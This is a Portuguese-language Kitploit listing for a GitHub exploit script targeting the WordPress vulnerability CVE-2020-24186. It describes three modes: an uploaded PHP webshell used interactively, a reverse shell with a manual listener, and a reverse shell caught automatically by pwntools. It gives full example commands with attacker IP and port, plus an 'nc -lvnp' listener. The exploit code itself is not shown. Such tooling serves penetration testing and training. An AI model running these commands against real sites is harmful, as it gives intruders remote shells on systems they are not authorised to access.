Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-24186 | Kitploit
Ferramentas/GitHubGitHub/gazettel/cve-2020-24186
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubgazettel/cve-2020-24186

CVE-2020-24186

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-24186

Este script explora a vulnerabilidade CVE-2020-24186 no WordPress para carregar um payload PHP camuflado e obter um shell no sistema alvo. Há três modos de operação:

  1. Shell Interativo:
    Carrega o webshell básico e entra em modo interativo, permitindo que você envie comandos através do parâmetro cmd.

  2. Reverse Shell Manual:
    Carrega o webshell e envia o payload de reverse shell, mas não inicia automaticamente um listener. Você deve iniciar manualmente o seu próprio listener no IP e porta especificados.

  3. Reverse Shell com pwntools:
    Carrega o webshell, envia o payload de reverse shell e o script inicia automaticamente um listener usando pwntools para capturar a conexão reversa.

Requisitos

  • Python 3.x
  • Bibliotecas Python:
    • requests
    • pwn (pwntools)
  • (Opcional) Configuração de proxy se você quiser rotear o tráfego (por exemplo, para testes com Burp Suite).

Opções de Uso

  • --url: URL base do site alvo (ex.: http://10.10.110.119).
  • --blogpath: Caminho para o post (padrão: /?page=1).
  • --mode: Modo de operação, interactive ou reverse.
  • --lhost: IP local para o reverse shell (obrigatório no modo reverse).
  • --lport: Porta local para o reverse shell (obrigatório no modo reverse).
  • --reverse_method: Método de reverse shell: bash, nc ou python (o padrão é bash).
  • --manual: Quando usado no modo reverse, o script não iniciará o listener; você deve iniciar o seu próprio listener manualmente.
  • --use-proxy: Se definido, as requisições serão enviadas através do proxy configurado.

Exemplos

1. Shell Interativo

Carregue um webshell e inicie uma sessão interativa para enviar comandos:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. Reverse Shell em Modo Manual

Carregue o webshell, envie o payload de reverse shell, mas não inicie automaticamente um listener. Inicie o seu próprio listener manualmente (ex.: usando netcat):

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

Em seguida, em outro terminal, inicie o seu listener manualmente:

root@kitploit:~
nc -lvnp 9002

1. Reverse Shell com pwntools

Carregue o webshell, envie o payload de reverse shell e faça o script iniciar automaticamente um listener com pwntools para capturar a conexão:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

O script aguardará uma conexão em 10.10.1.1:9002 e, uma vez conectado, fornecerá um shell interativo.

Notas Garanta que o site alvo seja vulnerável ao CVE-2020-24186 e que você tenha as permissões necessárias para testes de segurança. Você pode modificar o payload PHP usando a opção --php_payload se forem necessários ajustes. Verifique novamente as configurações de proxy se você usar a flag --use-proxy.

Baixar ferramenta